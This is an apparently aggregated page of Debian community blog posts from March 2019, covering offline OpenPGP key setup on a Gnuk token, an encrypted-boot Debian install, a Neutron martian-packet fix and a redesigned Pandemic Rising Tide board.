Operating within Normal Parameters: Monitoring Kubernetes

Additional Prometheus metrics sources

Related readings

I'm including these documents for reference to add some context around what's currently happening (as of 2019Q1) in the Kubernetes instrumentation SIG and wider ecosystem.

Note that GitHub links are pinned to their most recent commit to ensure they will not break; if you want the latest version, make sure to switch the branch to "master".

22 March, 2019 04:00AM by Elana Hashman

March 21, 2019

Simon Josefsson

Offline Ed25519 OpenPGP key with subkeys on FST-01G running Gnuk

Below I describe how to generate an OpenPGP key and import it to a FST-01G device running Gnuk. See my earlier post on planning for my new OpenPGP key and the post on preparing the FST-01G to run Gnuk. For comparison with a RSA/YubiKey based approach, you can read about my setup from 2014.

Most of the steps below are covered by the Gnuk manual. The primary complication for me is the use of a offline machine and storing GnuPG directory stored on a USB memory device.

Offline machine

I use a laptop that is not connected to the Internet and boot it from a read-only USB memory stick. Finding a live CD that contains the necessary tools for using GnuPG with smartcards (gpg-agent, scdaemon, pcscd) is significantly harder than it should be. Using a rarely audited image begs the question of whether you can trust it. A patched kernel/gpg to generate poor randomness would be an easy and hard to notice hack. I’m using the PGP/PKI Clean Room Live CD. Recommendations on more widely used and audited alternatives would be appreciated. Select “Advanced Options” and “Run Shell” to escape the menus. Insert a new USB memory device, and prepare it as follows: 

pgp@pgplive:/home/pgp$ sudo wipefs -a /dev/sdX
pgp@pgplive:/home/pgp$ sudo fdisk /dev/sdX
# create a primary partition of Linux type
pgp@pgplive:/home/pgp$ sudo mkfs.ext4 /dev/sdX1
pgp@pgplive:/home/pgp$ sudo mount /dev/sdX1 /mnt
pgp@pgplive:/home/pgp$ sudo mkdir /mnt/gnupghome
pgp@pgplive:/home/pgp$ sudo chown pgp.pgp /mnt/gnupghome
pgp@pgplive:/home/pgp$ sudo chmod go-rwx /mnt/gnupghome

GnuPG configuration

Set your GnuPG home directory to point to the gnupghome directory on the USB memory device. You will need to do this in every terminal windows you open that you want to use GnuPG in. 

pgp@pgplive:/home/pgp$ export GNUPGHOME=/mnt/gnupghome
pgp@pgplive:/home/pgp$

At this point, you should be able to run gpg --card-status and get output from the smartcard.

Create master key

Create a master key and make a backup copy of the GnuPG home directory with it, together with an export ASCII version. 

pgp@pgplive:/home/pgp$ gpg --quick-gen-key "Simon Josefsson <simon@josefsson.org>" ed25519 sign 216d
gpg: keybox '/mnt/gnupghome/pubring.kbx' created
gpg: /mnt/gnupghome/trustdb.gpg: trustdb created
gpg: key D73CF638C53C06BE marked as ultimately trusted
gpg: directory '/mnt/gnupghome/openpgp-revocs.d' created
gpg: revocation certificate stored as '/mnt/gnupghome/openpgp-revocs.d/B1D2BD1375BECB784CF4F8C4D73CF638C53C06BE.rev'
pub   ed25519 2019-03-20 [SC] [expires: 2019-10-22]
      B1D2BD1375BECB784CF4F8C4D73CF638C53C06BE
      B1D2BD1375BECB784CF4F8C4D73CF638C53C06BE
uid                      Simon Josefsson <simon@josefsson.org>

pgp@pgplive:/home/pgp$ gpg -a --export-secret-keys B1D2BD1375BECB784CF4F8C4D73CF638C53C06BE > $GNUPGHOME/masterkey.txt
pgp@pgplive:/home/pgp$ sudo cp -a $GNUPGHOME $GNUPGHOME-backup-masterkey
pgp@pgplive:/home/pgp$

Create subkeys

Create subkeys and make a backup of them too, as follows.

pgp@pgplive:/home/pgp$ gpg --quick-add-key B1D2BD1375BECB784CF4F8C4D73CF638C53C06BE cv25519 encr 216d
pgp@pgplive:/home/pgp$ gpg --quick-add-key B1D2BD1375BECB784CF4F8C4D73CF638C53C06BE ed25519 auth 216d
pgp@pgplive:/home/pgp$ gpg --quick-add-key B1D2BD1375BECB784CF4F8C4D73CF638C53C06BE ed25519 sign 216d
pgp@pgplive:/home/pgp$ gpg -a --export-secret-keys B1D2BD1375BECB784CF4F8C4D73CF638C53C06BE > $GNUPGHOME/mastersubkeys.txt
pgp@pgplive:/home/pgp$ gpg -a --export-secret-subkeys B1D2BD1375BECB784CF4F8C4D73CF638C53C06BE > $GNUPGHOME/subkeys.txt
pgp@pgplive:/home/pgp$ sudo cp -a $GNUPGHOME $GNUPGHOME-backup-mastersubkeys
pgp@pgplive:/home/pgp$

Move keys to card

Prepare the card by setting Admin PIN, PIN, your full name, sex, login account, and key URL as you prefer, following the Gnuk manual on card personalization.

Move the subkeys from your GnuPG keyring to the FST01G using the keytocard command.

Take a final backup — because moving the subkeys to the card modifes the local GnuPG keyring — and create a ASCII armored version of the public key, to be transferred to your daily machine. 

pgp@pgplive:/home/pgp$ gpg --list-secret-keys
/mnt/gnupghome/pubring.kbx
--------------------------
sec   ed25519 2019-03-20 [SC] [expires: 2019-10-22]
      B1D2BD1375BECB784CF4F8C4D73CF638C53C06BE
uid           [ultimate] Simon Josefsson <simon@josefsson.org>
ssb>  cv25519 2019-03-20 [E] [expires: 2019-10-22]
ssb>  ed25519 2019-03-20 [A] [expires: 2019-10-22]
ssb>  ed25519 2019-03-20 [S] [expires: 2019-10-22]

pgp@pgplive:/home/pgp$ gpg -a --export-secret-keys B1D2BD1375BECB784CF4F8C4D73CF638C53C06BE > $GNUPGHOME/masterstubs.txt
pgp@pgplive:/home/pgp$ gpg -a --export-secret-subkeys B1D2BD1375BECB784CF4F8C4D73CF638C53C06BE > $GNUPGHOME/subkeysstubs.txt
pgp@pgplive:/home/pgp$ gpg -a --export B1D2BD1375BECB784CF4F8C4D73CF638C53C06BE > $GNUPGHOME/publickey.txt
pgp@pgplive:/home/pgp$ cp -a $GNUPGHOME $GNUPGHOME-backup-masterstubs
pgp@pgplive:/home/pgp$

Transfer to daily machine

Copy publickey.txt to your day-to-day laptop and import it and create stubs using --card-status. 

jas@latte:~$ gpg --import < publickey.txt 
gpg: key D73CF638C53C06BE: public key "Simon Josefsson <simon@josefsson.org>" imported
gpg: Total number processed: 1
gpg:               imported: 1
jas@latte:~$ gpg --card-status

Reader ...........: Free Software Initiative of Japan Gnuk (FSIJ-1.2.14-67252015) 00 00
Application ID ...: D276000124010200FFFE672520150000
Version ..........: 2.0
Manufacturer .....: unmanaged S/N range
Serial number ....: 67252015
Name of cardholder: Simon Josefsson
Language prefs ...: sv
Sex ..............: male
URL of public key : https://josefsson.org/key-20190320.txt
Login data .......: jas
Signature PIN ....: not forced
Key attributes ...: ed25519 cv25519 ed25519
Max. PIN lengths .: 127 127 127
PIN retry counter : 3 3 3
Signature counter : 0
Signature key ....: A3CC 9C87 0B9D 310A BAD4  CF2F 5172 2B08 FE47 45A2
      created ....: 2019-03-20 23:40:49
Encryption key....: A9EC 8F4D 7F1E 50ED 3DEF  49A9 0292 3D7E E76E BD60
      created ....: 2019-03-20 23:40:26
Authentication key: CA7E 3716 4342 DF31 33DF  3497 8026 0EE8 A9B9 2B2B
      created ....: 2019-03-20 23:40:37
General key info..: sub  ed25519/51722B08FE4745A2 2019-03-20 Simon Josefsson <simon@josefsson.org>
sec   ed25519/D73CF638C53C06BE  created: 2019-03-20  expires: 2019-10-22
ssb>  cv25519/02923D7EE76EBD60  created: 2019-03-20  expires: 2019-10-22
                                card-no: FFFE 67252015
ssb>  ed25519/80260EE8A9B92B2B  created: 2019-03-20  expires: 2019-10-22
                                card-no: FFFE 67252015
ssb>  ed25519/51722B08FE4745A2  created: 2019-03-20  expires: 2019-10-22
                                card-no: FFFE 67252015
jas@latte:~$

Before the key can be used after the import, you must update the trust database for the secret key.

Now you should have a offline master key with subkey stubs. Note in the output below that the master key is not available (sec#) and the subkeys are stubs for smartcard keys (ssb>). 

jas@latte:~$ gpg --list-secret-keys
sec#  ed25519 2019-03-20 [SC] [expires: 2019-10-22]
      B1D2BD1375BECB784CF4F8C4D73CF638C53C06BE
uid           [ultimate] Simon Josefsson <simon@josefsson.org>
ssb>  cv25519 2019-03-20 [E] [expires: 2019-10-22]
ssb>  ed25519 2019-03-20 [A] [expires: 2019-10-22]
ssb>  ed25519 2019-03-20 [S] [expires: 2019-10-22]

jas@latte:~$

If your environment variables are setup correctly, SSH should find the authentication key automatically. 

jas@latte:~$ ssh-add -L
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILzCFcHHrKzVSPDDarZPYqn89H5TPaxwcORgRg+4DagE cardno:FFFE67252015
jas@latte:~$

GnuPG and SSH are now ready to be used with the new key. Thanks for reading!

21 March, 2019 08:45PM by simon

Installing Gnuk on FST-01G running NeuG

The FST-01G device that you order from the FSF shop runs NeuG. To be able to use the device as a OpenPGP smartcard, you need to install Gnuk. While Niibe covers this on his tutorial, I found the steps a bit complicated to follow. The following guides you from buying the device to getting a FST-01G running Gnuk ready for use with GnuPG.

Once you have received the device and inserted it into a USB port, your kernel log (sudo dmesg) will show something like the following:

[628772.874658] usb 1-1.5.1: New USB device found, idVendor=234b, idProduct=0004
[628772.874663] usb 1-1.5.1: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[628772.874666] usb 1-1.5.1: Product: Fraucheky
[628772.874669] usb 1-1.5.1: Manufacturer: Free Software Initiative of Japan
[628772.874671] usb 1-1.5.1: SerialNumber: FSIJ-0.0
[628772.875204] usb-storage 1-1.5.1:1.0: USB Mass Storage device detected
[628772.875452] scsi host6: usb-storage 1-1.5.1:1.0
[628773.886539] scsi 6:0:0:0: Direct-Access     FSIJ     Fraucheky        1.0  PQ: 0 ANSI: 0
[628773.887522] sd 6:0:0:0: Attached scsi generic sg2 type 0
[628773.888931] sd 6:0:0:0: [sdb] 128 512-byte logical blocks: (65.5 kB/64.0 KiB)
[628773.889558] sd 6:0:0:0: [sdb] Write Protect is off
[628773.889564] sd 6:0:0:0: [sdb] Mode Sense: 03 00 00 00
[628773.890305] sd 6:0:0:0: [sdb] No Caching mode page found
[628773.890314] sd 6:0:0:0: [sdb] Assuming drive cache: write through
[628773.902617]  sdb:
[628773.906066] sd 6:0:0:0: [sdb] Attached SCSI removable disk

The device comes up as a USB mass storage device. Conveniently, it contain documentation describing what it is, and you identify the version of NeuG it runs as follows. 

jas@latte:~/src/gnuk$ head /media/jas/Fraucheky/README 
NeuG - a true random number generator implementation (for STM32F103)

							  Version 1.0.7
							     2018-01-19
						           Niibe Yutaka
				      Free Software Initiative of Japan

To convert the device into the serial-mode that is required for the software upgrade, use the eject command for the device (above it came up as /dev/sdb): sudo eject /dev/sdb. The kernel log will now contain something like this: 

[628966.847387] usb 1-1.5.1: reset full-speed USB device number 27 using ehci-pci
[628966.955723] usb 1-1.5.1: device firmware changed
[628966.956184] usb 1-1.5.1: USB disconnect, device number 27
[628967.115322] usb 1-1.5.1: new full-speed USB device number 28 using ehci-pci
[628967.233272] usb 1-1.5.1: New USB device found, idVendor=234b, idProduct=0001
[628967.233277] usb 1-1.5.1: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[628967.233280] usb 1-1.5.1: Product: NeuG True RNG
[628967.233283] usb 1-1.5.1: Manufacturer: Free Software Initiative of Japan
[628967.233286] usb 1-1.5.1: SerialNumber: FSIJ-1.0.7-67252015
[628967.234034] cdc_acm 1-1.5.1:1.0: ttyACM0: USB ACM device

The strings NeuG True RNG and FSIJ-1.0.7 suggest it is running NeuG version 1.0.7.

Now both Gnuk itself and reGNUal needs to be built, as follows. If you get any error message, you likely don’t have the necessary dependencies installed. 

jas@latte:~/src$ git clone https://salsa.debian.org/gnuk-team/gnuk/neug.git
jas@latte:~/src$ git clone https://salsa.debian.org/gnuk-team/gnuk/gnuk.git
jas@latte:~/src$ cd gnuk/src/
jas@latte:~/src/gnuk/src$ git submodule update --init
jas@latte:~/src/gnuk/src$ ./configure --vidpid=234b:0000
...
jas@latte:~/src/gnuk/src$ make
...
jas@latte:~/src/gnuk/src$ cd ../regnual/
jas@latte:~/src/gnuk/regnual$ make
jas@latte:~/src/gnuk/regnual$ cd ../../

You are now ready to flash the device, as follows. 

jas@latte:~/src$ sudo neug/tool/neug_upgrade.py -f gnuk/regnual/regnual.bin gnuk/src/build/gnuk.bin 
gnuk/regnual/regnual.bin: 4544
gnuk/src/build/gnuk.bin: 113664
CRC32: 931cab51

Device: 
Configuration: 1
Interface: 1
20000e00:20005000
Downloading flash upgrade program...
start 20000e00
end   20001f00
# 20001f00: 31 : 196
Run flash upgrade program...
Wait 3 seconds...
Device: 
08001000:08020000
Downloading the program
start 08001000
end   0801bc00
jas@latte:~/src$

Remove and insert the device and the kernel log should contain something like this: 

[629120.399875] usb 1-1.5.1: new full-speed USB device number 32 using ehci-pci
[629120.511003] usb 1-1.5.1: New USB device found, idVendor=234b, idProduct=0000
[629120.511008] usb 1-1.5.1: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[629120.511011] usb 1-1.5.1: Product: Gnuk Token
[629120.511014] usb 1-1.5.1: Manufacturer: Free Software Initiative of Japan
[629120.511017] usb 1-1.5.1: SerialNumber: FSIJ-1.2.14-67252015

The device can now be used with GnuPG as a smartcard device. 

jas@latte:~/src/gnuk$ gpg --card-status
Reader ...........: 234B:0000:FSIJ-1.2.14-67252015:0
Application ID ...: D276000124010200FFFE672520150000
Version ..........: 2.0
Manufacturer .....: unmanaged S/N range
Serial number ....: 67252015
Name of cardholder: [not set]
Language prefs ...: [not set]
Sex ..............: unspecified
URL of public key : [not set]
Login data .......: [not set]
Signature PIN ....: forced
Key attributes ...: rsa2048 rsa2048 rsa2048
Max. PIN lengths .: 127 127 127
PIN retry counter : 3 3 3
Signature counter : 0
Signature key ....: [none]
Encryption key....: [none]
Authentication key: [none]
General key info..: [none]
jas@latte:~/src/gnuk$

Congratulations!

21 March, 2019 08:39PM by simon

OpenPGP 2019 Key Transition Statement

I have created a new OpenPGP key and will be transitioning away from my old key. If you have signed my old key, I would appreciate signatures on my new key as well. I have created a transition statement that can be downloaded from https://josefsson.org/key-transition-2019-03-20.txt.

Below is the signed statement.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

OpenPGP Key Transition Statement for Simon Josefsson <simon@josefsson.org>

I have created a new OpenPGP key and will be transitioning away from
my old key.  The old key has not been compromised and will continue to
be valid for some time, but I prefer all future correspondence to be
encrypted to the new key, and will be making signatures with the new
key going forward.

I would like this new key to be re-integrated into the web of trust.
This message is signed by both keys to certify the transition.  My new
and old keys are signed by each other.  If you have signed my old key,
I would appreciate signatures on my new key as well, provided that
your signing policy permits that without re-authenticating me.

The old key, which I am transitioning away from, is:

pub   rsa3744 2014-06-22 [SC]
      9AA9 BDB1 1BB1 B99A 2128  5A33 0664 A769 5426 5E8C

The new key, to which I am transitioning, is:

pub   ed25519 2019-03-20 [SC]
      B1D2 BD13 75BE CB78 4CF4  F8C4 D73C F638 C53C 06BE

The key may be downloaded from: https://josefsson.org/key-20190320.txt

To fetch the full new key from a public key server using GnuPG, run:

  gpg --keyserver keys.gnupg.net \
      --recv-key B1D2BD1375BECB784CF4F8C4D73CF638C53C06BE

If you already know my old key, you can now verify that the new key is
signed by the old one:

  gpg --check-sigs B1D2BD1375BECB784CF4F8C4D73CF638C53C06BE

If you are satisfied that you've got the right key, and the User IDs
match what you expect, I would appreciate it if you would sign my key:

  gpg --sign-key B1D2BD1375BECB784CF4F8C4D73CF638C53C06BE

You can upload your signatures to a public keyserver directly:

  gpg --keyserver keys.gnupg.net \
      --send-key B1D2BD1375BECB784CF4F8C4D73CF638C53C06BE

Or email simon@josefsson.org (possibly encrypted) the output from:

  gpg --armor --export B1D2BD1375BECB784CF4F8C4D73CF638C53C06BE

If you'd like any further verification or have any questions about the
transition please contact me directly.

To verify the integrity of this statement:

  wget -q -O- https://josefsson.org/key-transition-2019-03-20.txt | gpg --verify

/Simon
-----BEGIN PGP SIGNATURE-----

iQIHBAEBCgAdFiEEmqm9sRuxuZohKFozBmSnaVQmXowFAlyT8SQACgkQBmSnaVQm
XoxASQ6fUqFbueRikTu5Mp8V/J6BUoU94coqii3Pd15A2Kss9yzXpt+6ls5gpwzE
oxOubhxtFZ2WqNxVXwV/8e/48XDbDyy7WWh6Ao+8wQl+zl5CU8KUhM5zhUVR0BS4
IfTTs/JudrJASCocEPvRyuJ9cdhn66KCqleWIC+SEzPoxo+E941FxYUhHpL1jSul
ln1TR/0SGhSx19Cy6emej26p1Hs+kwHaiTo8eWgdQAg/yjY7z0RQJ1itVwfZaPJn
Ob2Bbs082U1Tho8RpjMS1mC9+cjsYadbMBgYTJ6HLkQ4xjuTFS021eWwdd0a39Pd
f4terKu+QT6y3FoQgQE8fZ+eaqEf5VLqVR/SxSR36LcrCX3GhBlEUo5RvYEWdRtd
uyBKR60G8zS0yGfDrsGjRT2Rag3B5rBbjml4Tn9nijG1LACeTci828y5+JykD7+l
l3kzrES90IOUwvrNQg9QyJxOJJ/SsZw2dcHEtltfg0o9nXxQqQQCA4STUSTLlf6p
G6T2+vd6LVYD5Zs6e4iutcvEpUzWYCvOC4RI+YMHrMU/nP44sgfjm4izx5CaKPH8
/UwQNhiS/ccsxMwEgnYTXi8shAUwA9gd6/92WVKCIMd5BpBi7JZ7QSoRiHUEARYK
AB0WIQSx0r0Tdb7LeEz0+MTXPPY4xTwGvgUCXJPxJAAKCRDXPPY4xTwGvuxpAQDn
Ws6Hn0RBqKyN5LJ4cXt55FDhaFpeJh7ZG4sHEdn3bAD/ags7v19305cAkvpbSEdX
MJoESOiUD1BwNTihVH9XBwc=
=r0qK
-----END PGP SIGNATURE-----

21 March, 2019 08:30PM by simon

Birger Schacht

Installing Debian with encrypted boot using GRML

A couple of days ago an interesting step-by-step guide on how to install Debian with full disk encryption, including /boot, using debian-installer was posted on the debian-boot mailinglist. This reminded me of the steps I used and wrote down a couple of month ago to create a similar setup. These steps describe a full disk (including /boot) encrypted setup on a non coreboot enabled system using the great grml live distro. (And just to be sure I just redid the same setup on a test device with the newest grml release Gnackwatschn):

The first step was to set up the network using grml-network after which I started by preparing the disk. I wiped the disks old partition table using sgdisk(8) and then created a 512MB EFI System partition and used the rest of the disk for a Linux partition:

sgdisk --zap-all /dev/sda
sgdisk -n1:1M:+512M -t1:EF00 /dev/sda
sgdisk -n2:0:0 -t2:8300 /dev/sda

Then I initialized the LUKS partition, set a passphrase and opened the LUKS device:

cryptsetup luksFormat /dev/sda2
cryptsetup luksOpen /dev/sda2 sda2_crypt

The LUKS device is then used to create a LVM volume group which in this example is called vg-2560p. In that volume group I created a logical volume for the /root filesystem:

pvcreate /dev/ampper/sda2_crypt
vgcreate vg-2560p /dev/mapper/sda2_crypt
lvcreate -L 120G vg-2560p -n root

The next step was to create an ext4 filesystem on the /root volume and a msdos filesystem with a 32bit file allocation table and the label EFI on the EFI System partition:

mkfs.ext4 /dev/vg-2560p/root
mkdosfs -F 32 -n EFI /dev/sda1

I then mounted the root partition, debootstrapped buster onto the partition, mounted the EFI partition and remounted /dev, /proc, /sys and /run into the new system:

mount /dev/vg-2560p/root /mnt
debootstrap buster /mnt http://deb.debian.org/debian
mkdir /mnt/boot/efi
mount /dev/sda1 /mnt/boot/efi
mount --rbind /dev /mnt/dev/
mount --rbind /proc /mnt/proc
mount --rbind /sys /mnt/sys
mount --rbind /run /mnt/run

After that I used chroot(8) to change into the buster installation and do some initial configuration. I first told apt(8) not to install recommended packages and then installed a kernel, grub, cryptsetup, lvm2 and sudo:

chroot /mnt /bin/bash
echo "Apt::Install-Recommends 0;" >> /etc/apt/apt.conf.d/local-recommends
apt install linux-image-amd64 cryptsetup lvm2 grub-efi-amd64 sudo

On the new system, the /etc/fstab file is empty and so I added the filesystems and I also added information about the encrypted disk to the /etc/crypttab file:

echo PARTUUID=$(blkid -s PARTUUID -o value /dev/sda1) /boot/efi vfat nofail,x-systemd.device-timeout=1 0 1 >> /etc/fstab
echo UUID=$(blkid -s UUID -o value /dev/mapper/vg--2560p-root) / ext4 defaults 0 1 >> /etc/fstab
echo sda2_crypt PARTUUID=$(blkid -s PARTUUID -o value /dev/sda2) none luks,discard,initramfs >> /etc/crypttab

I also had to tell grub to enable device decryption:

echo "GRUB_ENABLE_CRYPTODISK=y" >> /etc/default/grub
update-initramfs -c -k all
update-grub
grub-install --target=x86_64-efi

The final step, which I forget nearly every time when i install a system using debootstrap(8), was to ad a user account:

adduser bisco
adduser bisco sudo

PS: On the laptop I installed a couple of month ago, I had to set the path to the EFI Grub file (\EFI\debian\grubx64.efi) in bios. On the laptop i used to reproduce the above steps, i didn’t find that setting in bios (its from 2011, maybe a bios update would have helped), but I was able to choose the file during boot.

21 March, 2019 06:28PM

Arturo Borrero González

The martian packet case in our Neutron floating IP setup

Networking

A community member opened a bug the other day related to a weird networking behavior in the Cloud VPS service, offered by the Cloud Services team at Wikimedia Foundation. This VPS hosting service is based on Openstack, and we implement the networking bits by means of Neutron.

Our current setup is based on Openstack Mitaka (old, I know) and the networking architecture we use is extensively described in our docs. What is interesting today is our floating IP setup, which Neutron uses by means of the Netfilter NAT engine.

Neutron creates a couple of NAT rules for each floating IP, to implement both SNAT and DNAT. In our setup, if a VM uses a floating IP, then all its traffic to and from The Internet will use this floating IP. In our case, the floating IP range is made of public IPv4 addresses.

WMCS neutron setup

The bug/weird behavior consisted on the VM being unable to contact itself using the floating IP. A packet is generated in the VM with destination address the floating IP, a packet like this:

172.16.0.148 > 185.15.56.55 ICMP echo request

This packet reaches the neutron virtual router, and I could see it in tcpdump:

root@neutron-router:~# tcpdump -n -i qr-defc9d1d-40 icmp and host 172.16.0.148
11:51:48.652815 IP 172.16.0.148 > 185.15.56.55: ICMP echo request, id 32318, seq 1, length 64

Then, the PREROUTING NAT rules applies, translating 185.15.56.55 into 176.16.0.148. The corresponding conntrack NAT engine event:

root@neutron-router:~# conntrack -E -p icmp --src 172.16.0.148
    [NEW] icmp     1 30 src=172.16.0.148 dst=185.15.56.55 type=8 code=0 id=32395 [UNREPLIED] src=172.16.0.148 dst=172.16.0.148 type=0 code=0 id=32395

When this happens, the packet is put again in the wire, and I could see it again in a tcpdump running in the Neutron server box. You can see the 2 packets, the first without NAT, the second with the NAT applied:

root@neutron-router:~# tcpdump -n -i qr-defc9d1d-40 icmp and host 172.16.0.148
11:51:48.652815 IP 172.16.0.148 > 185.15.56.55: ICMP echo request, id 32318, seq 1, length 64
11:51:48.652842 IP 172.16.0.148 > 172.16.0.148: ICMP echo request, id 32318, seq 1, length 64

The Neutron virtual router routes this packet back to the original VM, and you can see the NATed packet reaching the interface. Note how I selected only incoming packets in tcpdump using -Q in

root@vm-instance:~# tcpdump -n -i eth0 -Q in icmp
11:51:48.650504 IP 172.16.0.148 > 172.16.0.148: ICMP echo request, id 32318, seq 1, length 64

And here is the thing. That packet can’t be routed by the VM:

root@vm-instance:~# ip route get 172.16.0.148 from 172.16.0.148 iif eth0
RTNETLINK answers: Invalid argument

This is known as a martian packet and you can actually see the kernel complaining if you turn on martian packet logging:

root@vm-instance:~# sysctl net.ipv4.conf.all.log_martians=1
root@vm-instance:~# dmesg -T | tail -2
[Tue Mar 19 12:16:26 2019] IPv4: martian source 172.16.0.148 from 172.16.0.148, on dev eth0
[Tue Mar 19 12:16:26 2019] ll header: 00000000: fa 16 3e d9 29 75 fa 16 3e ae f5 88 08 00        ..>.)u..>.....

The problem is that for local IP address, we recv a packet with same src/dst IPv4, with different src/dst MAC address. That’s nonsense from the network stack if not configured otherwise. If one wants to instruct the network stack to allow this, the fix is pretty easy:

root@vm-instance:~# sysctl net.ipv4.conf.all.accept_local=1

Now, ping from the VM to the floating IP works:

root@vm-intance:~# ping 185.15.56.55
PING 185.15.56.55 (185.15.56.55) 56(84) bytes of data.
64 bytes from 172.16.0.148: icmp_seq=1 ttl=64 time=0.202 ms
64 bytes from 172.16.0.148: icmp_seq=2 ttl=64 time=0.228 ms
^C
--- 185.15.56.55 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1011ms
rtt min/avg/max/mdev = 0.202/0.215/0.228/0.013 ms

And ip route reports it correctly:

root@vm-intance:~# ip route get 172.16.0.148 from 172.16.0.148 iif eth0
local 172.16.0.148 from 172.16.0.148 dev lo 
    cache <local>  iif eth0

You can read more about all the sysctl configs for network in the Linux kernel docs. In concrete this one:

accept_local - BOOLEAN
	Accept packets with local source addresses. In combination with
	suitable routing, this can be used to direct packets between two
	local interfaces over the wire and have them accepted properly.
	default FALSE

The Cloud VPS service offered by the Wikimedia Foundation is an open project, open to use by anyone connected with the Wikimedia movement and we encourage the community to work with us in improving it. Yes, is open to collaboration as well, also technical / engineering contributors, and you are welcome to contribute to this or any of the many other collaborative efforts in this global movement.

21 March, 2019 08:00AM

Ian Jackson

Pandemic Rising Tide - a new board design

As I wrote previously (link added here):
[personal profile] ceb gave me the board game Pandemic Rising Tide for Christmas. I like it a lot. However, the board layout, while very pretty and historically accurate, is awkward for play. I decided to produce a replacement board design, with a schematic layout.

This project is now complete at last! Not only do I have PDFs ready for printing on a suitable printer, but I have made a pretty good properly folding actual board.

Why a new board design

The supplied board is truly a work of art. Every wrinkle in the coastline and lots of details of boundaries of various parts of the Netherlands are faithfully reproduced.

To play the game, though, it is necessary to see quickly which "squares" (faces of the boundary graph; the rules call them regions) are connected to which others, and what the fastest walking route is, and so on. Also one places dyke tokens - small brown sticks - along some of the edges; it is often necessary to quickly see whether a face has any dykes on any of its edges, or whether there is a dyke between two adjacent faces.

This is hard to do on the original board. This has been at least one forum thread and one player shared their modifications involving pipe cleaners and glue!

Results - software, and PDFs

Much of the work in this project was producing the image to go on the board - in particular, laying out the graph was quite hard and involved shaving a number of yaks. (I'll be posting properly about my planar graph layout tool too.)

In case you like my layout, I have published a complete set of PDFs suitable for printing out yourself. There's a variety depending on what printer you are going to use. See the README.txt in that directory for details.

Of course the source code is available too. (Building it is not so easy - see the same README for details.)

Results - physical board

I consulted with [personal profile] ceb who had very useful bookbinding expertise and gave copious and useful advice, and also very kindly let me use some of their supplies. I had a local print shop print out a suitable PDF on their excellent A1 colour laserprinter, with very good results. (The photos below don't do justice to the colour rendering.)

The whole board is backed with bookcloth (the cloth which is used for the spines of hardback books), and that backing forms one of the two hinges. The other hinge is a separate piece of bookcloth on the top face. Then on top of that is the actual board image sheet, all put on in one go (so it all aligns correctly) and then cut along the "convex" hinge after the glue was dry.

I did some experiments to get the hang of the techniques and materials, and to try out a couple of approaches. Then I wrote myself a set of detailed instruction notes, recalculated the exact sizes, and did a complete practice run at 1/sqrt(8) scale. That served me well.

The actual construction took most of a Saturday afternoon and evening, and then the completed board had to be pressed for about 48h while it dried, to stop it warping.

There was one part that it wasn't really practical to practice: actually pasting a 624 x 205mm sheet of 120gsm paper, covered in a mixture of PVA and paste, onto a slightly larger arrangement of boards, is really quite tricky to do perfectly - even if you have a bookbinder on hand to help with another pair of hands. So if you look closely at my finished article you can see some blemishes. But, overall, I am pleased.

Pictures

If you just want to admire my board design, you can look at this conveniently sized PDF. I also took some photographs. But, for here, a taster:



comment count unavailable comments

21 March, 2019 01:02AM